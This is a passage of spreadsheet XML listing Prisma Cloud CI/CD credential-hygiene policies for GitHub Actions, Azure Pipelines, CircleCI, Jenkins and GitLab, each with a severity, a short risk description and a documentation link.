https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gha-unrotated-repo-secrets</t>
        </is>
      </c>
      <c r="Y130" t="inlineStr"/>
      <c r="Z130" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA130" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB130" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC130" t="inlineStr"/>
      <c r="AD130" t="b">
        <v>1</v>
      </c>
      <c r="AE130" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF130" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>b75d14ce-dd6c-45da-8d9d-6f7e8a394525</t>
        </is>
      </c>
      <c r="AI130" t="inlineStr"/>
      <c r="AJ130" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK130" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" t="inlineStr"/>
      <c r="B131" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C131" s="2" t="inlineStr"/>
      <c r="D131" t="inlineStr"/>
      <c r="E131" t="inlineStr"/>
      <c r="F131" t="inlineStr"/>
      <c r="G131" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J131" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K131" t="inlineStr">
        <is>
          <t>Environment variables exposed when printed to log in Azure Pipelines</t>
        </is>
      </c>
      <c r="L131" t="inlineStr"/>
      <c r="M131" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N131" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O131" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P131" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q131" t="inlineStr"/>
      <c r="R131" t="inlineStr"/>
      <c r="S131" t="inlineStr"/>
      <c r="T131" t="b">
        <v>0</v>
      </c>
      <c r="U131" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V131" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W131" t="inlineStr">
        <is>
          <t>Environment variables are widely used in CI/CD systems as a common method of sharing secrets between processes. They may contain credentials, internal host addresses, and additional sensitive information. Once environment variables are printed to the pipeline job log, an attacker with access to the log can exfiltrate these secrets, reaching sensitive resources.</t>
        </is>
      </c>
      <c r="X131" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repos-env-var-exposed-printlog</t>
        </is>
      </c>
      <c r="Y131" t="inlineStr"/>
      <c r="Z131" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA131" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB131" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC131" t="inlineStr"/>
      <c r="AD131" t="b">
        <v>1</v>
      </c>
      <c r="AE131" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF131" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>aa095959-f2e5-4c00-9f2b-c70504a043ef</t>
        </is>
      </c>
      <c r="AI131" t="inlineStr"/>
      <c r="AJ131" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK131" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" t="inlineStr"/>
      <c r="B132" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C132" s="2" t="inlineStr"/>
      <c r="D132" t="inlineStr"/>
      <c r="E132" t="inlineStr"/>
      <c r="F132" t="inlineStr"/>
      <c r="G132" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J132" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K132" t="inlineStr">
        <is>
          <t>CircleCI accesses cloud provider using insecure long-term credentials</t>
        </is>
      </c>
      <c r="L132" t="inlineStr"/>
      <c r="M132" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N132" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O132" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P132" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q132" t="inlineStr"/>
      <c r="R132" t="inlineStr"/>
      <c r="S132" t="inlineStr"/>
      <c r="T132" t="b">
        <v>0</v>
      </c>
      <c r="U132" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V132" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W132" t="inlineStr">
        <is>
          <t>CircleCI uses long-term credentials to authenticate cloud service providers when running pipeline jobs. These credentials are stored as environment variables in CircleCI. Attackers who gain access to a user with write permissions can expose these secrets, allowing them long term access to the cloud service provider.</t>
        </is>
      </c>
      <c r="X132" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/circleci-cicd-pipeline-policies/circleci-accesses-cloudprovider-insecure-longtermcredentials</t>
        </is>
      </c>
      <c r="Y132" t="inlineStr"/>
      <c r="Z132" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA132" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB132" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC132" t="inlineStr"/>
      <c r="AD132" t="b">
        <v>1</v>
      </c>
      <c r="AE132" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF132" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>c478f0b1-2b42-46af-a959-e58df53137ff</t>
        </is>
      </c>
      <c r="AI132" t="inlineStr"/>
      <c r="AJ132" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK132" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" t="inlineStr"/>
      <c r="B133" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C133" s="2" t="inlineStr"/>
      <c r="D133" t="inlineStr"/>
      <c r="E133" t="inlineStr"/>
      <c r="F133" t="inlineStr"/>
      <c r="G133" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J133" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K133" t="inlineStr">
        <is>
          <t>Jenkins environment variables exposed when printed to log</t>
        </is>
      </c>
      <c r="L133" t="inlineStr"/>
      <c r="M133" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N133" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O133" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P133" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q133" t="inlineStr"/>
      <c r="R133" t="inlineStr"/>
      <c r="S133" t="inlineStr"/>
      <c r="T133" t="b">
        <v>0</v>
      </c>
      <c r="U133" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V133" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W133" t="inlineStr">
        <is>
          <t>Environment variables are widely used in CI/CD systems as a common method of sharing secrets between processes. They may contain credentials, internal host addresses, and additional sensitive information. Once environment variables are printed to the pipeline job log, an attacker with access to the log can exfiltrate these secrets, reaching sensitive resources.</t>
        </is>
      </c>
      <c r="X133" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-var-exposed-printlog</t>
        </is>
      </c>
      <c r="Y133" t="inlineStr"/>
      <c r="Z133" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA133" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB133" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC133" t="inlineStr"/>
      <c r="AD133" t="b">
        <v>1</v>
      </c>
      <c r="AE133" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF133" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>d4048bbe-b416-4180-874f-db3592ec9c73</t>
        </is>
      </c>
      <c r="AI133" t="inlineStr"/>
      <c r="AJ133" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK133" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" t="inlineStr"/>
      <c r="B134" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C134" s="2" t="inlineStr"/>
      <c r="D134" t="inlineStr"/>
      <c r="E134" t="inlineStr"/>
      <c r="F134" t="inlineStr"/>
      <c r="G134" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J134" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K134" t="inlineStr">
        <is>
          <t>Secrets found in console output of an Azure pipeline</t>
        </is>
      </c>
      <c r="L134" t="inlineStr"/>
      <c r="M134" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N134" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O134" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P134" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q134" t="inlineStr"/>
      <c r="R134" t="inlineStr"/>
      <c r="S134" t="inlineStr"/>
      <c r="T134" t="b">
        <v>0</v>
      </c>
      <c r="U134" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V134" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W134" t="inlineStr">
        <is>
          <t>Secrets exposed in build log files can be used by an attacker that has taken over an account with access to the system in order to move laterally in the organization. Exposed secrets can be caused by not using the relevant feature to protect credentials or by printing credentials in a way that bypasses the feature's ability to detect credentials.</t>
        </is>
      </c>
      <c r="X134" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repos-secrets-in-pipeline-logs</t>
        </is>
      </c>
      <c r="Y134" t="inlineStr"/>
      <c r="Z134" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA134" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB134" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC134" t="inlineStr"/>
      <c r="AD134" t="b">
        <v>1</v>
      </c>
      <c r="AE134" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF134" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>05229ef5-da68-4cdf-aee5-1ffe396b3c00</t>
        </is>
      </c>
      <c r="AI134" t="inlineStr"/>
      <c r="AJ134" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK134" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" t="inlineStr"/>
      <c r="B135" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C135" s="2" t="inlineStr"/>
      <c r="D135" t="inlineStr"/>
      <c r="E135" t="inlineStr"/>
      <c r="F135" t="inlineStr"/>
      <c r="G135" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J135" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K135" t="inlineStr">
        <is>
          <t>CircleCI environment variables exposed when printed to log</t>
        </is>
      </c>
      <c r="L135" t="inlineStr"/>
      <c r="M135" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N135" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O135" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P135" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q135" t="inlineStr"/>
      <c r="R135" t="inlineStr"/>
      <c r="S135" t="inlineStr"/>
      <c r="T135" t="b">
        <v>0</v>
      </c>
      <c r="U135" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V135" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W135" t="inlineStr">
        <is>
          <t>Environment variables are widely used in CI/CD systems as a common method of sharing secrets between processes. They may contain credentials, internal host addresses, and additional sensitive information. Once environment variables are printed to the pipeline job log, an attacker with access to the log can exfiltrate these secrets, reaching sensitive resources.</t>
        </is>
      </c>
      <c r="X135" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/circleci-cicd-pipeline-policies/circleci-var-exposed-printlog</t>
        </is>
      </c>
      <c r="Y135" t="inlineStr"/>
      <c r="Z135" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA135" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB135" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC135" t="inlineStr"/>
      <c r="AD135" t="b">
        <v>1</v>
      </c>
      <c r="AE135" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF135" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>45377df2-09d8-4c19-a8e7-74ed730fbe88</t>
        </is>
      </c>
      <c r="AI135" t="inlineStr"/>
      <c r="AJ135" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK135" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" t="inlineStr"/>
      <c r="B136" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C136" s="2" t="inlineStr"/>
      <c r="D136" t="inlineStr"/>
      <c r="E136" t="inlineStr"/>
      <c r="F136" t="inlineStr"/>
      <c r="G136" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J136" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K136" t="inlineStr">
        <is>
          <t>Unrotated organization secrets in GitHub Actions</t>
        </is>
      </c>
      <c r="L136" t="inlineStr"/>
      <c r="M136" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N136" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O136" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P136" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q136" t="inlineStr"/>
      <c r="R136" t="inlineStr"/>
      <c r="S136" t="inlineStr"/>
      <c r="T136" t="b">
        <v>0</v>
      </c>
      <c r="U136" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V136" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W136" t="inlineStr">
        <is>
          <t>Secrets stored in your GitHub organization were not rotated for more than 180 days. As long as a secret exists, the greater the potential for an attacker to gain access to it. An attacker who gains access to such secrets could potentially compromise various components of your infrastructure and applications, resulting in unauthorized access and data breaches.</t>
        </is>
      </c>
      <c r="X136" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gha-unrotated-org-secrets</t>
        </is>
      </c>
      <c r="Y136" t="inlineStr"/>
      <c r="Z136" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA136" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB136" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC136" t="inlineStr"/>
      <c r="AD136" t="b">
        <v>1</v>
      </c>
      <c r="AE136" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF136" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>fe0f0402-323b-4c32-81bb-f15f1b1e6254</t>
        </is>
      </c>
      <c r="AI136" t="inlineStr"/>
      <c r="AJ136" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK136" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" t="inlineStr"/>
      <c r="B137" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C137" s="2" t="inlineStr"/>
      <c r="D137" t="inlineStr"/>
      <c r="E137" t="inlineStr"/>
      <c r="F137" t="inlineStr"/>
      <c r="G137" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J137" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K137" t="inlineStr">
        <is>
          <t>GitHub organization secret not scoped</t>
        </is>
      </c>
      <c r="L137" t="inlineStr"/>
      <c r="M137" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N137" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O137" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P137" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q137" t="inlineStr"/>
      <c r="R137" t="inlineStr"/>
      <c r="S137" t="inlineStr"/>
      <c r="T137" t="b">
        <v>0</v>
      </c>
      <c r="U137" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V137" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W137" t="inlineStr">
        <is>
          <t>In GitHub organizations where secrets are not scoped to specific repositories and GitHub Actions is enabled, a malicious actor who has access to the organization could access these secrets by creating a workflow or modifying an existing workflow. This creates a security risk, as sensitive information could be exposed to unauthorized parties.</t>
        </is>
      </c>
      <c r="X137" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-org-secret-not-scoped</t>
        </is>
      </c>
      <c r="Y137" t="inlineStr"/>
      <c r="Z137" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA137" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB137" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC137" t="inlineStr"/>
      <c r="AD137" t="b">
        <v>1</v>
      </c>
      <c r="AE137" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF137" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>ad206bb2-23f5-4a21-bc6f-5b6cc9e89d5f</t>
        </is>
      </c>
      <c r="AI137" t="inlineStr"/>
      <c r="AJ137" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK137" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" t="inlineStr"/>
      <c r="B138" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C138" s="2" t="inlineStr"/>
      <c r="D138" t="inlineStr"/>
      <c r="E138" t="inlineStr"/>
      <c r="F138" t="inlineStr"/>
      <c r="G138" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J138" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K138" t="inlineStr">
        <is>
          <t>Insecure definition of secret variable in Azure pipeline</t>
        </is>
      </c>
      <c r="L138" t="inlineStr"/>
      <c r="M138" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N138" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O138" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P138" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q138" t="inlineStr"/>
      <c r="R138" t="inlineStr"/>
      <c r="S138" t="inlineStr"/>
      <c r="T138" t="b">
        <v>0</v>
      </c>
      <c r="U138" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V138" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W138" t="inlineStr">
        <is>
          <t>The task.setvariable command is the least secure way to set secret variables in Azure Pipelines. This is because the secret is stored in plain text in the pipeline yaml file, which anyone with access to the pipeline can view. In addition, hard coded secrets can make it difficult to maintain your code. If you need to change a secret or to perform a periodic rotation, you will need to update it in all of the places where it is used. This can be a time-consuming and error-prone process.</t>
        </is>
      </c>
      <c r="X138" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repo-insecure-def-secret-var</t>
        </is>
      </c>
      <c r="Y138" t="inlineStr"/>
      <c r="Z138" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA138" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB138" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC138" t="inlineStr"/>
      <c r="AD138" t="b">
        <v>1</v>
      </c>
      <c r="AE138" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF138" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>b16e2a62-1825-45d2-b722-948092e40beb</t>
        </is>
      </c>
      <c r="AI138" t="inlineStr"/>
      <c r="AJ138" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK138" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" t="inlineStr"/>
      <c r="B139" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C139" s="2" t="inlineStr"/>
      <c r="D139" t="inlineStr"/>
      <c r="E139" t="inlineStr"/>
      <c r="F139" t="inlineStr"/>
      <c r="G139" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J139" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K139" t="inlineStr">
        <is>
          <t>GitLab Variable is not scoped to an environment</t>
        </is>
      </c>
      <c r="L139" t="inlineStr"/>
      <c r="M139" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N139" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O139" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P139" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q139" t="inlineStr"/>
      <c r="R139" t="inlineStr"/>
      <c r="S139" t="inlineStr"/>
      <c r="T139" t="b">
        <v>0</v>
      </c>
      <c r="U139" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V139" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W139" t="inlineStr">
        <is>
          <t>GitLab CI/CD environment variables in projects and groups can be scoped to project environments in order to limit access of pipelines to them. Sensitive variables that are not scoped can be accessed by in secure pipelines (for example, on test environments), without proper controls on accessing these variables.</t>
        </is>
      </c>
      <c r="X139" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-var-notscoped-env</t>
        </is>
      </c>
      <c r="Y139" t="inlineStr"/>
      <c r="Z139" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA139" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB139" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC139" t="inlineStr"/>
      <c r="AD139" t="b">
        <v>1</v>
      </c>
      <c r="AE139" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF139" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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 t="inlineStr">
        <is>
          <t>3248c68a-2913-416d-a7f0-6b5ff8c0ef2f</t>
        </is>
      </c>
      <c r="AI139" t="inlineStr"/>
      <c r="AJ139" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK139" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" t="inlineStr"/>
      <c r="B140" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C140" s="2" t="inlineStr"/>
      <c r="D140" t="inlineStr"/>
      <c r="E140" t="inlineStr"/>
      <c r="F140" t="inlineStr"/>
      <c r="G140" t="b">
        <v>1</v>
      </c>
      <c r="H1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 t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J140" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K140" t="inlineStr">
        <is>
          <t>Secrets found in GitHub webhook URL</t>
        </is>
      </c>
      <c r="L140" t="inlineStr"/>
      <c r="M140" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N140" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O140" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P140" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q140" t="inlineStr"/>
      <c r="R140" t="inlineStr"/>
      <c r="S140" t="inlineStr"/>
      <c r="T140" t="b">
        <v>0</v>
      </c>
      <c r="U140" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V140" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W140" t="inlineStr">
        <is>
